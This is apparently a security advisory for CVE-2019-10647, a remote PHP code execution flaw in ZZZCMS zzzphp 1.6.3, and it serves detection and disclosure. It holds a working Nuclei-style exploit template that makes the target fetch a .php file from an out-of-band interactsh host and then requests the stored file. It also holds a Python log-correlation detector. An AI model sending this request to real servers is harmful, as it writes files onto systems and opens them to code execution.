CVE-2019-10647: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)

Date: 2025-12-12 | Affected software: ZZZCMS ZZZPHP | PoC: public

Vulnerability description

ZZZCMS zzzphp v1.6.3 contains a remote code execution vulnerability caused by a lack of file-type restrictions in inc/zzz_file.php. An attacker can execute arbitrary PHP code by supplying a crafted URL in the source[] parameter of plugins/ueditor/php/controller.php?action=catchimage. Exploitation requires the attacker to submit a malicious URL and to control a server that serves the PHP code as plain text.

PoC code [public]

id: CVE-2019-10647

info:
  name: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
  author: Sourabh-Sahu
  severity: critical
  description: |
    ZZZCMS zzzphp v1.6.3 contains a remote code execution vulnerability caused by a lack of file-type restrictions in inc/zzz_file.php. An attacker can execute arbitrary PHP code by supplying a crafted URL in the source[] parameter of plugins/ueditor/php/controller.php?action=catchimage. Exploitation requires the attacker to submit a malicious URL and to control a server that serves the PHP code as plain text.
  impact: |
    Attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of ZZZCMS or apply security patches that restrict PHP file handling in inc/zzz_file.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10647
    - https://github.com/kyrie403/Vuln/blob/master/zzzcms/zzzphp%20v1.6.3%20write%20file%20with%20dangerous%20type.md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-10647
    cwe-id: CWE-434
    epss-score: 0.60335
    epss-percentile: 0.98188
    cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zzzcms
    product: zzzphp
  tags: cve,cve2019,rce,zzzphp,intrusive,file-upload,vuln,zzzcms,oast,oob,vkev

flow: http(1) && http(2)

variables:
  file: "{{randstr}}.php"

http:
  - raw:
      - |
        POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source[]=http://{{interactsh-url}}/{{file}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains_all(body, "SUCCESS","state")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: filename
        group: 1  # keep only the capture group (the stored file name), not the "title" key itself
        regex:
          - '"title":"([^"]+)"'
        internal: true

  - raw:
      # second stage: request the file named by the "filename" extractor from the first response
      - |
        GET /upload/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: status
        status:
          - 200
# digest: 4a0a0047304502210082c6f5a4672afc71bfa5df85c1680ca5cc95446e6438b06d96735bb48b0aba2202203ac617bf7dbdc12bc21a871faae2d2a0441f2d64cf23275b38a1342702adea39:922c64590222798bb761d5b6d8e72950
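As an added detection example (not part of the advisory or the zzzphp project), the following correlates the same two-stage flow the template above checks for: a POST to action=catchimage followed, from the same client, by a GET for a .php file under /upload/ that the server answers with 200. It assumes combined-format access logs and the /upload/ path shown in the template; the log lines are constructed samples.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format (assumed); the two paths mirror the PoC template's request flow.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
CATCHIMAGE_RE = re.compile(r'^/plugins/ueditor/php/controller\.php\?.*\baction=catchimage\b', re.I)
UPLOADED_PHP_RE = re.compile(r'^/upload/[^/?]+\.php\d*(\?|$)', re.I)

# Constructed sample lines: one benign client and one that completes both stages.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2025:10:00:01 +0000] "POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1" 200 128 "-" "curl/8.0"
198.51.100.2 - - [12/Dec/2025:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 5321 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2025:10:00:03 +0000] "GET /upload/x7f3kq.php HTTP/1.1" 200 17 "-" "curl/8.0"
198.51.100.2 - - [12/Dec/2025:10:05:00 +0000] "GET /upload/photo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    return entry

def find_catchimage_chains(log_text, window_seconds=600):
    """Return (ip, catchimage_path, php_path) for each client that POSTed to
    action=catchimage and, within the window, fetched a .php file under /upload/
    that returned 200. The POST alone is weak evidence (the editor uses it legitimately);
    the served .php confirms the unrestricted write. Access logs carry no POST body,
    so the source[] value itself is not visible here."""
    window = timedelta(seconds=window_seconds)
    catch_by_ip = defaultdict(list)
    hits = []
    for raw in log_text.splitlines():
        e = parse(raw)
        if e is None:
            continue
        if e["method"] == "POST" and CATCHIMAGE_RE.match(e["path"]):
            catch_by_ip[e["ip"]].append(e)
        elif e["method"] == "GET" and e["status"] == "200" and UPLOADED_PHP_RE.match(e["path"]):
            for c in catch_by_ip[e["ip"]]:
                if c["ts"] <= e["ts"] <= c["ts"] + window:
                    hits.append((e["ip"], c["path"], e["path"]))
                    break
    return hits
```

Running `find_catchimage_chains(SAMPLE_LOG)` flags only 203.0.113.7; the benign client's PNG fetch is ignored because it never hit catchimage and the file is not PHP.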